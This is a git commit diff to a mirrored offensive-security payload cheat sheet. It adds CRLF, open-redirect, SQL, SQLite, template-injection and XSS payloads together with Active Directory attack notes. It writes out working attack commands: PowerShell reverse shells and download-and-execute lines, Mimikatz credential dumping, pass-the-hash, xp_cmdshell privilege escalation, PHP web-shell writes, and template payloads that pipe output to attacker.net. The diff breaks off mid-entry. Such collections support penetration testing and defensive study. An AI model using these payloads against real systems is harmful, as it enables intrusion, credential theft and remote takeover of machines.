mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
SQLmap tips + Active Directory attacks + SQLite injections
This commit is contained in:
parent
70f38d5678
commit
30019235f8
17
CRLF injection/crlfinjection.txt
Normal file
17
CRLF injection/crlfinjection.txt
Normal file
@ -0,0 +1,17 @@
|
||||
/%%0a0aSet-Cookie:crlf=injection
|
||||
/%0aSet-Cookie:crlf=injection
|
||||
/%0d%0aSet-Cookie:crlf=injection
|
||||
/%0dSet-Cookie:crlf=injection
|
||||
/%23%0aSet-Cookie:crlf=injection
|
||||
/%23%0d%0aSet-Cookie:crlf=injection
|
||||
/%23%0dSet-Cookie:crlf=injection
|
||||
/%25%30%61Set-Cookie:crlf=injection
|
||||
/%25%30aSet-Cookie:crlf=injection
|
||||
/%250aSet-Cookie:crlf=injection
|
||||
/%25250aSet-Cookie:crlf=injection
|
||||
/%2e%2e%2f%0d%0aSet-Cookie:crlf=injection
|
||||
/%2f%2e%2e%0d%0aSet-Cookie:crlf=injection
|
||||
/%2F..%0d%0aSet-Cookie:crlf=injection
|
||||
/%3f%0d%0aSet-Cookie:crlf=injection
|
||||
/%3f%0dSet-Cookie:crlf=injection
|
||||
/%u000aSet-Cookie:crlf=injection
|
88
Methodology and Resources/Active Directory Attack.md
Normal file
88
Methodology and Resources/Active Directory Attack.md
Normal file
@ -0,0 +1,88 @@
|
||||
# Active Directory Attacks
|
||||
|
||||
## Most common paths to AD compromise
|
||||
* MS14-068
|
||||
* MS17-010 (Eternal Blue - Local Admin)
|
||||
```c
|
||||
nmap -Pn -p445 — open — max-hostgroup 3 — script smb-vuln-ms17–010 <ip_netblock>
|
||||
```
|
||||
* Unconstrained Delegation (incl. pass-the-ticket)
|
||||
* OverPass-the-Hash (Making the most of NTLM password hashes)
|
||||
* Pivoting with Local Admin & Passwords in SYSVOL
|
||||
* Dangerous Built-in Groups Usage
|
||||
* Dumping AD Domain Credentials
|
||||
* Golden Tickets
|
||||
* Kerberoast
|
||||
* Silver Tickets
|
||||
* Trust Tickets
|
||||
|
||||
|
||||
## Tools
|
||||
* [Impacket](https://github.com/CoreSecurity/impacket)
|
||||
* Responder
|
||||
* Mimikatz
|
||||
* [Ranger](https://github.com/funkandwagnalls/ranger)
|
||||
* BloodHound
|
||||
* RottenPotato
|
||||
|
||||
## Mimikatz
|
||||
```
|
||||
load mimikatz
|
||||
mimikatz_command -f sekurlsa::logonPasswords full
|
||||
```
|
||||
|
||||
## PowerSploit
|
||||
```
|
||||
https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon
|
||||
powershell.exe -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks”
|
||||
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');"
|
||||
```
|
||||
|
||||
|
||||
## PrivEsc - Token Impersonation (RottenPotato)
|
||||
Binary available at : https://github.com/foxglovesec/RottenPotato
|
||||
Binary available at : https://github.com/breenmachine/RottenPotatoNG
|
||||
```c
|
||||
getuid
|
||||
getprivs
|
||||
use incognito
|
||||
list\_tokens -u
|
||||
cd c:\temp\
|
||||
execute -Hc -f ./rot.exe
|
||||
impersonate\_token "NT AUTHORITY\SYSTEM"
|
||||
```
|
||||
|
||||
```
|
||||
Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"
|
||||
Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
|
||||
Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"
|
||||
```
|
||||
|
||||
## PrivEsc - MS14-068
|
||||
```
|
||||
Exploit Python : https://www.exploit-db.com/exploits/35474/
|
||||
|
||||
Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068
|
||||
```
|
||||
|
||||
## PrivEsc - MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
|
||||
```
|
||||
Powershell:
|
||||
https://www.exploit-db.com/exploits/39719/
|
||||
https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1
|
||||
|
||||
Binary exe : https://github.com/Meatballs1/ms16-032
|
||||
|
||||
Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc
|
||||
```
|
||||
|
||||
## Kerberoast
|
||||
```
|
||||
https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/
|
||||
https://room362.com/post/2016/kerberoast-pt1/
|
||||
```
|
||||
|
||||
## Thanks to
|
||||
* [https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html](https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html)
|
||||
* [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa)
|
||||
* [Road to DC](https://steemit.com/infosec/@austinhudson/road-to-dc-part-1)
|
@ -72,6 +72,10 @@ Powershell
|
||||
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
|
||||
```
|
||||
|
||||
```powershell
|
||||
powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')
|
||||
```
|
||||
|
||||
Java
|
||||
```java
|
||||
r = Runtime.getRuntime()
|
||||
@ -109,6 +113,14 @@ ruby: exec "/bin/sh"
|
||||
lua: os.execute('/bin/sh')
|
||||
```
|
||||
|
||||
Access shortcuts, su, nano and autocomplete in a partially tty shell
|
||||
```
|
||||
ctrl+z
|
||||
stty raw -echo
|
||||
fg
|
||||
```
|
||||
/!\ OhMyZSH might break this trick
|
||||
|
||||
(From within vi)
|
||||
```
|
||||
:!bash
|
||||
@ -124,3 +136,4 @@ lua: os.execute('/bin/sh')
|
||||
* [Reverse Bash Shell One Liner](https://security.stackexchange.com/questions/166643/reverse-bash-shell-one-liner)
|
||||
* [Pentest Monkey - Cheat Sheet Reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
|
||||
* [Spawning a TTY Shell](http://netsec.ws/?p=337)
|
||||
* [Obtaining a fully interactive shell](https://forum.hackthebox.eu/discussion/142/obtaining-a-fully-interactive-shell)
|
@ -12,6 +12,7 @@ creds
|
||||
```
|
||||
|
||||
## Metasploit - Psexec
|
||||
Note: the password can be replaced by a hash to execute a `pass the hash` attack.
|
||||
```c
|
||||
use exploit/windows/smb/psexec
|
||||
set RHOST 10.2.0.3
|
||||
@ -29,6 +30,11 @@ python crackmapexec.py 10.9.122.0/25 -d CSCOU -u jarrieta -p nastyCutt3r
|
||||
python crackmapexec.py 10.9.122.5 -d CSCOU -u jarrieta -p nastyCutt3r -x whoami
|
||||
```
|
||||
|
||||
## Crackmapexec (Pass The Hash)
|
||||
```
|
||||
cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51' --local-auth
|
||||
```
|
||||
|
||||
## Winexe (Integrated to Kali)
|
||||
```python
|
||||
winexe -U CSCOU/jarrieta%nastyCutt3r //10.9.122.5 cmd.exe
|
||||
@ -51,6 +57,10 @@ Note: you may need to enable it with the following command
|
||||
```
|
||||
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x00000000 /f
|
||||
```
|
||||
or with psexec(sysinternals)
|
||||
```
|
||||
psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
|
||||
```
|
||||
|
||||
## Netuse (Windows)
|
||||
```
|
||||
@ -69,6 +79,8 @@ PsExec.exe \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe
|
||||
PsExec.exe \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe -s # get System shell
|
||||
```
|
||||
|
||||
|
||||
## Thanks
|
||||
- [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/)
|
||||
- [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
|
||||
- [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
|
||||
- [Gaining Domain Admin from Outside Active Directory](https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html)
|
||||
|
67
Open redirect/openredirects.txt
Normal file
67
Open redirect/openredirects.txt
Normal file
@ -0,0 +1,67 @@
|
||||
/%09/example.com
|
||||
/%2f%2fexample.com
|
||||
/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
|
||||
/%5cexample.com
|
||||
/%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
|
||||
/.example.com
|
||||
//%09/example.com
|
||||
//%5cexample.com
|
||||
///%09/example.com
|
||||
///%5cexample.com
|
||||
////%09/example.com
|
||||
////%5cexample.com
|
||||
/////example.com
|
||||
/////example.com/
|
||||
////\;@example.com
|
||||
////example.com/
|
||||
////example.com/%2e%2e
|
||||
////example.com/%2e%2e%2f
|
||||
////example.com/%2f%2e%2e
|
||||
////example.com/%2f..
|
||||
////example.com//
|
||||
///\;@example.com
|
||||
///example.com
|
||||
///example.com/
|
||||
///example.com/%2e%2e
|
||||
///example.com/%2e%2e%2f
|
||||
///example.com/%2f%2e%2e
|
||||
///example.com/%2f..
|
||||
///example.com//
|
||||
//example.com
|
||||
//example.com/
|
||||
//example.com/%2e%2e
|
||||
//example.com/%2e%2e%2f
|
||||
//example.com/%2f%2e%2e
|
||||
//example.com/%2f..
|
||||
//example.com//
|
||||
//google%00.com
|
||||
//google%E3%80%82com
|
||||
//https:///example.com/%2e%2e
|
||||
//https://example.com/%2e%2e%2f
|
||||
//https://example.com//
|
||||
/<>//example.com
|
||||
/?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com
|
||||
/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redirect_uri=/\/example.com
|
||||
/?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com
|
||||
/\/\/example.com/
|
||||
/\/example.com/
|
||||
/example.com/%2f%2e%2e
|
||||
/http://%67%6f%6f%67%6c%65%2e%63%6f%6d
|
||||
/http://example.com
|
||||
/http:/example.com
|
||||
/https:/%5cexample.com/
|
||||
/https://%09/example.com
|
||||
/https://%5cexample.com
|
||||
/https:///example.com/%2e%2e
|
||||
/https:///example.com/%2f%2e%2e
|
||||
/https://example.com
|
||||
/https://example.com/
|
||||
/https://example.com/%2e%2e
|
||||
/https://example.com/%2e%2e%2f
|
||||
/https://example.com/%2f%2e%2e
|
||||
/https://example.com/%2f..
|
||||
/https://example.com//
|
||||
/https:example.com
|
||||
/redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com
|
||||
/redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redir=/\/example.com&rurl=/\/example.com&redirect_uri=/\/example.com
|
||||
/redirect?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com
|
@ -67,6 +67,29 @@ Commands execution with a line return
|
||||
something%0Acat%20/etc/passwd
|
||||
```
|
||||
|
||||
Bypass blacklisted word with single quote
|
||||
```
|
||||
w'h'o'am'i
|
||||
```
|
||||
|
||||
Bypass blacklisted word with double quote
|
||||
```
|
||||
w"h"o"am"i
|
||||
```
|
||||
|
||||
Bypass blacklisted word with $@
|
||||
```
|
||||
who$@ami
|
||||
```
|
||||
|
||||
Bypass zsh/bash/sh blacklist
|
||||
```
|
||||
echo $0
|
||||
-> /usr/bin/zsh
|
||||
echo whoami|$0
|
||||
```
|
||||
|
||||
|
||||
## Time based data exfiltration
|
||||
Extracting data : char by char
|
||||
```
|
||||
|
80
SQL injection/MSSQL Injection.md
Normal file
80
SQL injection/MSSQL Injection.md
Normal file
@ -0,0 +1,80 @@
|
||||
# MSSQL Injection
|
||||
|
||||
## MSSQL version
|
||||
```
|
||||
SELECT @@version
|
||||
```
|
||||
|
||||
## MSSQL database name
|
||||
```
|
||||
SELECT DB_NAME()
|
||||
```
|
||||
|
||||
## MSSQL List Databases
|
||||
```
|
||||
SELECT name FROM master..sysdatabases;
|
||||
SELECT DB_NAME(N); — for N = 0, 1, 2, …
|
||||
```
|
||||
|
||||
## MSSQL List Column
|
||||
```
|
||||
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the current DB only
|
||||
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable
|
||||
```
|
||||
|
||||
## MSSQL List Tables
|
||||
```
|
||||
SELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for views
|
||||
SELECT name FROM someotherdb..sysobjects WHERE xtype = ‘U’;
|
||||
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable
|
||||
```
|
||||
|
||||
|
||||
## MSSQL User Password
|
||||
```
|
||||
MSSQL 2000:
|
||||
SELECT name, password FROM master..sysxlogins
|
||||
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.)
|
||||
|
||||
MSSQL 2005
|
||||
SELECT name, password_hash FROM master.sys.sql_logins
|
||||
SELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
|
||||
```
|
||||
|
||||
## MSSQL Error based
|
||||
```
|
||||
For integer inputs : convert(int,@@version)
|
||||
For string inputs : ' + convert(int,@@version) + '
|
||||
```
|
||||
|
||||
## MSSQL Time based
|
||||
```
|
||||
ProductID=1;waitfor delay '0:0:10'--
|
||||
ProductID=1);waitfor delay '0:0:10'--
|
||||
ProductID=1';waitfor delay '0:0:10'--
|
||||
ProductID=1');waitfor delay '0:0:10'--
|
||||
ProductID=1));waitfor delay '0:0:10'--
|
||||
```
|
||||
|
||||
## MSSQL Command execution
|
||||
```
|
||||
EXEC xp_cmdshell "net user";
|
||||
EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'
|
||||
EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1'
|
||||
```
|
||||
If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005)
|
||||
```
|
||||
EXEC sp_configure 'show advanced options',1
|
||||
RECONFIGURE
|
||||
EXEC sp_configure 'xp_cmdshell',1
|
||||
RECONFIGURE
|
||||
```
|
||||
|
||||
## MSSQL Make user DBA (DB admin)
|
||||
```
|
||||
EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
|
||||
```
|
||||
|
||||
## Thanks to
|
||||
* [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
|
||||
* [Sqlinjectionwiki - MSSQL](http://www.sqlinjectionwiki.com/categories/1/mssql-sql-injection-cheat-sheet/)
|
@ -43,6 +43,22 @@ python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wis
|
||||
sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs
|
||||
```
|
||||
|
||||
Shell
|
||||
```
|
||||
SQL Shell
|
||||
python sqlmap.py -u "http://example.com/?id=1" -p id --sql-shell
|
||||
|
||||
Simple Shell
|
||||
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell
|
||||
|
||||
Dropping a reverse-shell / meterpreter
|
||||
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn
|
||||
```
|
||||
|
||||
Using suffix to tamper the injection
|
||||
```
|
||||
python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- "
|
||||
```
|
||||
|
||||
General tamper option and tamper's list
|
||||
```
|
||||
@ -338,3 +354,5 @@ mysql> mysql> select version();
|
||||
* Second Order:
|
||||
- [Analyzing CVE-2018-6376 – Joomla!, Second Order SQL Injection](https://www.notsosecure.com/analyzing-cve-2018-6376/)
|
||||
- [Exploiting Second Order SQLi Flaws by using Burp & Custom Sqlmap Tamper](https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/)
|
||||
* Sqlmap:
|
||||
- [#SQLmap protip @zh4ck](https://twitter.com/zh4ck/status/972441560875970560)
|
||||
|
@ -1,5 +1,9 @@
|
||||
# SQLite Injection
|
||||
|
||||
## SQLite version
|
||||
```
|
||||
select sqlite_version();
|
||||
```
|
||||
|
||||
## Integer/String based - Extract table name
|
||||
```
|
||||
@ -34,9 +38,9 @@ and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and
|
||||
|
||||
## Remote Command Execution using SQLite command - Attach Database
|
||||
```
|
||||
ATTACH DATABASE ‘/var/www/lol.php’ AS lol;
|
||||
ATTACH DATABASE '/var/www/lol.php' AS lol;
|
||||
CREATE TABLE lol.pwn (dataz text);
|
||||
INSERT INTO lol.pwn (dataz) VALUES (‘<?system($_GET[‘cmd’]); ?>’);--
|
||||
INSERT INTO lol.pwn (dataz) VALUES ('<?system($_GET['cmd']); ?>');--
|
||||
```
|
||||
|
||||
## Remote Command Execution using SQLite command - Load_extension
|
||||
@ -46,4 +50,4 @@ UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');
|
||||
Note: By default this component is disabled
|
||||
|
||||
## Thanks to
|
||||
[Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/41397.pdf)
|
||||
[Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/41397.pdf)
|
||||
|
@ -90,6 +90,13 @@ Bypass using rare address
|
||||
http://0/
|
||||
```
|
||||
|
||||
Bypass using bash variables (curl only)
|
||||
```
|
||||
curl -v "http://evil$google.com"
|
||||
|
||||
$google = ""
|
||||
```
|
||||
|
||||
Bypass using tricks combination
|
||||
```
|
||||
http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
|
||||
@ -108,6 +115,7 @@ List:
|
||||
|
||||
|
||||
## SSRF via URL Scheme
|
||||
|
||||
Dict://
|
||||
The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol:
|
||||
```
|
||||
@ -230,3 +238,4 @@ http://0251.00376.000251.0000376/ Dotted octal with padding
|
||||
* [AppSecEU15 Server side browsing considered harmful - @Agarri](http://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf)
|
||||
* [Enclosed alphanumerics - @EdOverflow](https://twitter.com/EdOverflow)
|
||||
* [Hacking the Hackers: Leveraging an SSRF in HackerTarget - @sxcurity](http://www.sxcurity.pro/2017/12/17/hackertarget/)
|
||||
* [PHP SSRF @secjuice](https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51)
|
||||
|
@ -1,47 +1,127 @@
|
||||
# Templates Injections
|
||||
|
||||
Template injection allows an attacker to include template code into an existant (or not) template.
|
||||
> Template injection allows an attacker to include template code into an existant (or not) template.
|
||||
|
||||
Recommended tool: [Tplmap](https://github.com/epinna/tplmap)
|
||||
e.g:
|
||||
```
|
||||
./tplmap.py --os-shell -u 'http://www.target.com/page?name=John'
|
||||
```
|
||||
|
||||
|
||||
## Ruby
|
||||
#### Basic injection
|
||||
### Basic injection
|
||||
```python
|
||||
<%= 7 * 7 %>
|
||||
```
|
||||
|
||||
#### Retrieve /etc/passwd
|
||||
### Retrieve /etc/passwd
|
||||
```python
|
||||
<%= File.open('/etc/passwd').read %>
|
||||
```
|
||||
|
||||
|
||||
## Java
|
||||
#### Basic injection
|
||||
### Basic injection
|
||||
```java
|
||||
${{7*7}}
|
||||
```
|
||||
|
||||
#### Retrieve the system’s environment variables.
|
||||
### Retrieve the system’s environment variables.
|
||||
```java
|
||||
${T(java.lang.System).getenv()}
|
||||
```
|
||||
|
||||
#### Retrieve /etc/passwd
|
||||
### Retrieve /etc/passwd
|
||||
```java
|
||||
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
|
||||
```
|
||||
|
||||
## Twig
|
||||
### Basic injection
|
||||
```python
|
||||
{{7*7}}
|
||||
{{7*'7'}} would result in 49
|
||||
```
|
||||
|
||||
### Template format
|
||||
```python
|
||||
$output = $twig > render (
|
||||
'Dear' . $_GET['custom_greeting'],
|
||||
array("first_name" => $user.first_name)
|
||||
);
|
||||
|
||||
$output = $twig > render (
|
||||
"Dear {first_name}",
|
||||
array("first_name" => $user.first_name)
|
||||
);
|
||||
```
|
||||
|
||||
### Code execution
|
||||
```python
|
||||
{{self}}
|
||||
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
|
||||
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
|
||||
```
|
||||
|
||||
|
||||
## Smarty
|
||||
```python
|
||||
{php}echo `id`;{/php}
|
||||
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
|
||||
```
|
||||
|
||||
## Freemarker
|
||||
Default functionality.
|
||||
```python
|
||||
<#assign
|
||||
ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
|
||||
```
|
||||
|
||||
## Jade / Codepen
|
||||
```python
|
||||
- var x = root.process
|
||||
- x = x.mainModule.require
|
||||
- x = x('child_process')
|
||||
= x.exec('id | nc attacker.net 80')
|
||||
```
|
||||
|
||||
## Velocity
|
||||
```python
|
||||
#set($str=$class.inspect("java.lang.String").type)
|
||||
#set($chr=$class.inspect("java.lang.Character").type)
|
||||
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))
|
||||
$ex.waitFor()
|
||||
#set($out=$ex.getInputStream())
|
||||
#foreach($i in [1..$out.available()])
|
||||
$str.valueOf($chr.toChars($out.read()))
|
||||
#end
|
||||
```
|
||||
|
||||
## Mako
|
||||
```python
|
||||
<%
|
||||
import os
|
||||
x=os.popen('id').read()
|
||||
%>
|
||||
${x}
|
||||
```
|
||||
|
||||
|
||||
## Jinja2
|
||||
[Official website](http://jinja.pocoo.org/)
|
||||
> Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.
|
||||
|
||||
#### Basic injection
|
||||
|
||||
### Basic injection
|
||||
```python
|
||||
{{4*4}}[[5*5]]
|
||||
{{7*'7'}} would result in 7777777
|
||||
```
|
||||
|
||||
Jinja2 is used by Python Web Frameworks such as Django or Flask.
|
||||
The above injections have been tested on Flask application.
|
||||
#### Template format
|
||||
### Template format
|
||||
```python
|
||||
{% extends "layout.html" %}
|
||||
{% block body %}
|
||||
@ -54,12 +134,12 @@ The above injections have been tested on Flask application.
|
||||
|
||||
```
|
||||
|
||||
#### Dump all used classes
|
||||
### Dump all used classes
|
||||
```python
|
||||
{{ ''.__class__.__mro__[2].__subclasses__() }}
|
||||
```
|
||||
|
||||
#### Dump all config variables
|
||||
### Dump all config variables
|
||||
```python
|
||||
{% for key, value in config.iteritems() %}
|
||||
<dt>{{ key|e }}</dt>
|
||||
@ -67,18 +147,18 @@ The above injections have been tested on Flask application.
|
||||
{% endfor %}
|
||||
```
|
||||
|
||||
#### Read remote file
|
||||
### Read remote file
|
||||
```python
|
||||
# ''.__class__.__mro__[2].__subclasses__()[40] = File class
|
||||
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
|
||||
```
|
||||
|
||||
#### Write into remote file
|
||||
### Write into remote file
|
||||
```python
|
||||
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}
|
||||
```
|
||||
|
||||
#### Remote Code Execution via reverse shell
|
||||
### Remote Code Execution via reverse shell
|
||||
Listen for connexion
|
||||
```
|
||||
nv -lnvp 8000
|
||||
@ -94,5 +174,5 @@ Inject this template
|
||||
* [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
|
||||
* [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/)
|
||||
* [Ruby ERB Template injection - TrustedSec](https://www.trustedsec.com/2017/09/rubyerb-template-injection/)
|
||||
#### Training
|
||||
[https://w3challs.com/](https://w3challs.com/)
|
||||
* [Gist - Server-Side Template Injection - RCE For the Modern WebApp by James Kettle (PortSwigger)](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98)
|
||||
* [PDF - Server-Side Template Injection: RCE for the modern webapp - @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf)
|
||||
|
@ -2,5 +2,17 @@
|
||||
<head></head>
|
||||
<body>
|
||||
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
|
||||
|
||||
<info>
|
||||
<name>
|
||||
<value><![CDATA[<script>confirm(document.domain)</script>]]></value>
|
||||
</name>
|
||||
<description>
|
||||
<value>Hello</value>
|
||||
</description>
|
||||
<url>
|
||||
<value>http://google.com</value>
|
||||
</url>
|
||||
</info>
|
||||
</body>
|
||||
</html>
|
||||
</html>
|
||||
|
@ -71,6 +71,12 @@ XSS for HTML5
|
||||
<marquee onstart=alert(1)>
|
||||
```
|
||||
|
||||
XSS using script tag (external payload)
|
||||
```
|
||||
<script src=14.rs>
|
||||
you can alsoo specify an arbitratry payload with 14.rs/#payload
|
||||
e.g: 14.rs/#alert(document.domain)
|
||||
```
|
||||
|
||||
XSS in META tag
|
||||
```
|
||||
@ -147,7 +153,15 @@ XSS with vbscript: only IE
|
||||
vbscript:msgbox("XSS")
|
||||
```
|
||||
## XSS in files
|
||||
XSS in XML
|
||||
** NOTE:** The XML CDATA section is used here so that the JavaScript payload will not be treated as XML markup.
|
||||
```
|
||||
<name>
|
||||
<value><![CDATA[<script>confirm(document.domain)</script>]]></value>
|
||||
</name>
|
||||
```
|
||||
|
||||
|
||||
XSS in XML
|
||||
```
|
||||
<html>
|
||||
<head></head>
|
||||
@ -432,6 +446,17 @@ Bypass case sensitive
|
||||
<sCrIpt>alert(1)</ScRipt>
|
||||
```
|
||||
|
||||
Bypass tag blacklist
|
||||
```
|
||||
<script x>
|
||||
<script x>alert('XSS')<script y>
|
||||
```
|
||||
|
||||
Bypass with incomplete html tag - IE/Firefox/Chrome/Safari
|
||||
```
|
||||
<img src='1' onerror='alert(0)' <
|
||||
```
|
||||
|
||||
Bypass quotes for string
|
||||
```
|
||||
String.fromCharCode(88,83,83)
|
||||
@ -486,10 +511,6 @@ Bypass space filter with "/" - IE/Firefox/Chrome/Safari
|
||||
<img/src='1'/onerror=alert(0)>
|
||||
```
|
||||
|
||||
Bypass with incomplete html tag - IE/Firefox/Chrome/Safari
|
||||
```
|
||||
<img src='1' onerror='alert(0)' <
|
||||
```
|
||||
|
||||
Bypass document blacklist
|
||||
```
|
||||
@ -503,6 +524,7 @@ foo="text </script><script>alert(1)</script>";
|
||||
</script>
|
||||
```
|
||||
|
||||
|
||||
Bypass using an alternate way to execute an alert - [@brutelogic](https://twitter.com/brutelogic/status/965642032424407040)
|
||||
```
|
||||
window['alert'](0)
|
||||
@ -566,6 +588,22 @@ Bypass ';' using another character
|
||||
'te' instanceof alert('instanceof') instanceof 'xt';
|
||||
```
|
||||
|
||||
Bypass using HTML encoding
|
||||
```
|
||||
%26%2397;lert(1)
|
||||
```
|
||||
|
||||
Bypass using Katakana (https://github.com/aemkei/katakana.js)
|
||||
```
|
||||
